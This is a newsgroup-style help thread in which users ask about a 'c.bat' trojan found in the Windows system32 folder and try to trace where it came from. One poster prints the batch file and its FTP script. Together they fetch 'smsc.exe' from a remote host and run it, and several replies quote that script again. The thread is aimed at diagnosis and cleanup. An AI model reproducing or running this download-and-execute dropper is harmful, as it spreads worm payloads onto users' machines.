"c.bat" trojan

[Branden Wolner]

Hi,

NAV found this trojan on one of our computers recently. It was in the
system32 folder and was called "c.bat". It contained command line code that
turned the echo off and then executed an FTP command (I did not write down
the entire command) and then self-erased. NAV could not clean or delete the
file, and when we hit "ok" it redetected it. NAV 8.0 BTW. I had to disable
auto protect, reboot, and then manually delete the file. I have no idea
where it came from as we has just wiped the entire hard drive and
reinstalled XP from the CD, followed by NAV and a live update of NAV.
Clearly, the trojan is designed to exploit someone mistyping "c:" at the
command prompt. Cannot find any info at symantec, macafee or by google
search. Anyone know anything about this? Where it comes from? We did have
an open DSL connection at the time it was found. Any info would be
appreciated. Thanks.

 

[Dave G.]

I know it's closing the barn door after the horse is out;
no pun intended, but, spend the 24.95 and buy Trojen
Remover from Simply Super Software on-line. It renames
the Trojen (so it can be cleaned and deleted) and deletes
it automatically when you scan. I also learned the hard
way.

 

[Branden Wolner]

Thanks but since it was never executed, it's not a problem. My real need
is to know how it got on the computer - where it came from. As I said, we
installed XP from CD-rom, then installed Verizon DSL, then NAV 8.0
followed by live update. Then we installed SP1 from windowsupdate. Then
all other updates/patches/fixes. Somewhere along the line, this file
showed up in the c:\windows\system32 folder. How and why?

 

[Branden Wolner]

Thanks but since it was never executed, it's not a problem. My real need
is to know how it got on the computer - where it came from. As I said, we
installed XP from CD-rom, then installed Verizon DSL, then NAV 8.0
followed by live update. Then we installed SP1 from windowsupdate. Then
all other updates/patches/fixes. Somewhere along the line, this file
showed up in the c:\windows\system32 folder. How and why?

 

[Jon]

If the file is still in your recycle bin, restore it
Then right-click it (don't left-click !!) and choose edit
Press ctrl-a, ctrl -c, to copy it to clipboard and paste its code in here,
and we can tell you what it does, which may also provide clues as to its
origin.

Jon

 

[Nunya]

Our whole company has this popping up all over, symantec detects it,
but I cant figure out where it is coming from. It says file
c:\winnt\system32\c.bat is infected with bat.trojan, but Symantecs
website has no info on that particular virus, only 2 other
bat.trojan.xxx files that are very old.

 

[Branden Wolner]

If the file is still in your recycle bin, restore it
Then right-click it (don't left-click !!) and choose edit
Press ctrl-a, ctrl -c, to copy it to clipboard and paste its code in
here, and we can tell you what it does, which may also provide clues
as to its origin.

Thanks but it's gone now. Maybe someone else has gotten it and can paste
the code here?

 

[Ross Brown]

Thanks but it's gone now. Maybe someone else has gotten it and can paste
the code here?

I am seeing similar behavior on the network, Norton detecting the
c.bat, but not the source that is creating it. I opened the c.bat
file, and here are the contents:

@echo off
ftp -n -v -s:.pif
smsc.exe
del .pif

The .pif file contains the FTP commands:

open 0.0.0.0 18454
user a a
binary
GET smsc.exe
bye

I haven't found smsc.exe on any of the systems on our network yet.

 

[Branden Wolner]

(e-mail address removed) (Ross Brown) wrote in

I am seeing similar behavior on the network, Norton detecting the
c.bat, but not the source that is creating it. I opened the c.bat
file, and here are the contents:

@echo off
ftp -n -v -s:.pif
smsc.exe
del .pif

The .pif file contains the FTP commands:

open 0.0.0.0 18454
user a a
binary
GET smsc.exe
bye

I haven't found smsc.exe on any of the systems on our network yet.

Interesting info here:
http://uk.trendmicro-europe.com/enterprise/security_info/ve_detail.php?
VName=WORM_AGOBOT.WF

 

[P. Wiley]

@echo off
ftp -n -v -s:.pif
smsc.exe
del .pif

 

[adrien_yee]

how to remove it?

i deleted it but it reappears after reboot

 

[Richard Urban]

Post this in the virus newsgroup or do a search for it on Google.

--
Regards:

Richard Urban

aka Crusty (-: Old B@stard